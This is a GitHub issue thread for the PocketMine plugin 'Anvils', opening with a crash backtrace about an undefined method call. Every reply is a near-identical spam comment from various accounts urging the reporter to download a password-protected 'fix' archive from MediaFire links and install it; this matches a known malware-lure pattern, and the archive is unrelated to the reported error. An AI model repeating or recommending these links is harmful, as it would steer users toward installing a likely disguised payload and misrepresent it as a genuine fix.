### ISSUE TITLE
EROR

### ISSUE THREAD

**Issue by Frosxc** [AmmyRQ/Anvils#5]
THIS CRASH WAS CAUSED BY A PLUGIN
BAD PLUGIN: Anvils

Thread: Main
Error: Call to undefined method pocketmine\network\mcpe\protocol\types\inventory\stackrequest\ItemStackRequestSlotInfo::getContainerId()
File: plugins/Anvils_dev-2 (2).phar/src/AmmyRQ/Anvils/Main
Line: 77
Type: Error
Backtrace:
#0 pmsrc/src/event/RegisteredListener(61): AmmyRQ\Anvils\Main->onReceive(object pocketmine\event\server\DataPacketReceiveEvent#1162660)
#1 pmsrc/src/event/Event(63): pocketmine\event\RegisteredListener->callEvent(object pocketmine\event\server\DataPacketReceiveEvent#1162660)
#2 pmsrc/src/network/mcpe/NetworkSession(461): pocketmine\event\Event->call()
#3 pmsrc/src/network/mcpe/NetworkSession(407): pocketmine\network\mcpe\NetworkSession->handleDataPacket(object pocketmine\network\mcpe\protocol\ItemStackRequestPacket#1162667, string[26] .......;..................)
#4 pmsrc/src/network/mcpe/raklib/RakLibInterface(214): pocketmine\network\mcpe\NetworkSession->handleEncoded(string[72] .....(...h...B`....?.8O`..r..D..S....".~..7.93@.H.......^...bh...`/..)..)
#5 pmsrc/vendor/pocketmine/raklib-ipc/src/RakLibToUserThreadMessageReceiver(40): pocketmine\network\mcpe\raklib\RakLibInterface->onPacketReceive(int 0, string[81] .....M$.m\.v..V].L...............(.?T.7.j.#If..X.F$.@c~...t.6m.Ad.j.k...I......M)
#6 pmsrc/src/network/mcpe/raklib/RakLibInterface(107): raklib\server\ipc\RakLibToUserThreadMessageReceiver->handle(object pocketmine\network\mcpe\raklib\RakLibInterface#1089014)
#7 pmsrc/src/TimeTrackingSleeperHandler(58): pocketmine\network\mcpe\raklib\RakLibInterface->pocketmine\network\mcpe\raklib\{closure}()
#8 pmsrc/vendor/pocketmine/snooze/src/SleeperHandler(120): pocketmine\TimeTrackingSleeperHandler->pocketmine\{closure}()
#9 pmsrc/src/TimeTrackingSleeperHandler(77): pocketmine\snooze\SleeperHandler->processNotifications()
#10 pmsrc/vendor/pocketmine/snooze/src/SleeperHandler(79): pocketmine\TimeTrackingSleeperHandler->processNotifications()
#11 pmsrc/src/Server(1698): pocketmine\snooze\SleeperHandler->sleepUntil(float 1724487646.0232)
#12 pmsrc/src/Server(1066): pocketmine\Server->tickProcessor()
#13 pmsrc/src/PocketMine(355): pocketmine\Server->__construct(object pocketmine\thread\ThreadSafeClassLoader#6, object pocketmine\utils\MainLogger#2, string[16] /home/container/, string[24] /home/container/plugins/)
#14 pmsrc/src/PocketMine(378): pocketmine\server()
#15 /home/container/PocketMine-MP.phar(168): require(string[72] phar:///tmp/PocketMine-MP-phar-cache.0/PMMPvHZClF.tar/src/PocketMine.php)

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
